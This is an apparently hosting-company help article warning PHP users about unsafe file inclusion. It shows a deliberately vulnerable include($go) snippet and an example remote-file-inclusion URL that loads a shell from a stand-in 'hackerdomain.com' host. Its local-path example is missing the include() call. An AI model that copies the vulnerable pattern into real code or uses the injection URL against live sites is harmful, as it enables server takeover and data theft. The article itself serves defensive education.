PHP Security and YOU - Including files the right way

PHP Security and YOU - Including files the right way

As a web host we fight the battle against hackers and bad code on a daily basis. So HostNexus is looking to encourage clients to use file inclusion within PHP in a more security conscious and safe manner.

Including files with PHP is a common practice and most usage comes in 2 forms. These are including internal files from your own domain and including files from remote (external) sources. This looks something like:

 

Internal:

< ?php
include("http://www.myowndomain.com/something.txt");
?>

External:

< ?php include("http://www.externaldomain.com/something.txt"); ?>

Both are valid syntax in the PHP world but there are two main problems we see on the servers. Sometimes when you include a file using the the URL of your local domain you can cause a PHP loop that initiates endless HTTP requests which causes server load issues and even a server crash due to the load. If you want to include files from your local domain you just need to use the server path instead:

< ?php
('/home/httpd/vhosts/myowndomain.com/httpdocs/something.txt');
?>

And now onto using include() for calling external files:

< ?php
include("http://www.externaldomain.com/something.txt");
?>

The main problem with include() is that runs everything through the PHP parser and evaluates code. The main problem comes from setting a variable for include() which can be easily exploited. Here is an example of code in an index.php:

< ?php
echo "<html>\n";
echo " <body>\n";
include("$go");
echo " </body>\n";
echo "\n";
?>

The $go variable above is easily exploited like:

http://myowndomain.com/index.php?go=http://www.hackerdomain.com/shell.txt

The hacker can now execute commands on your files, installing phishing sites, sending spam and stealing data.

If you want to include files from remote domains use PHP's readfile() function instead:

http://www.php.net/manual/en/function.readfile.php

While not 100% secure it still provides more protection as readfile() simply outputs data to a browser rather than parsing everything as PHP.

Tha's All Folks!

 

See you all next time.

Ήταν χρήσιμη αυτήν την απάντηση;

 Εκτύπωση αυτού του άρθρου

Επίσης Διαβάστε

Συνδέσεις προς «κακόφημες γειτονιές»

Συνδέσεις προς...

Μερικές διευθύνσεις με free Templates

http://www.freewebsitetemplates.com http://www.template4all.com/...

Δείτε αναλυτικά τις επιδόσεις του Website ή του Blog σας τόσο σε παγκόσμιο όσο και σε πανελλαδικό επίπεδο.

http://greekinnovation.blogspot.com/2011/02/alexacom.html http://greekinnovation.blogspot.com/

Βελτιστοποιώντας μια σελίδα

Βελτιστοποιώντας μια σελίδα για υψηλή κατάταξη, και μετά αντικαθιστώντας την με μια άλλη όταν η...

ποιοτικά links

Έχοντας μια...

Powered by WHMCompleteSolution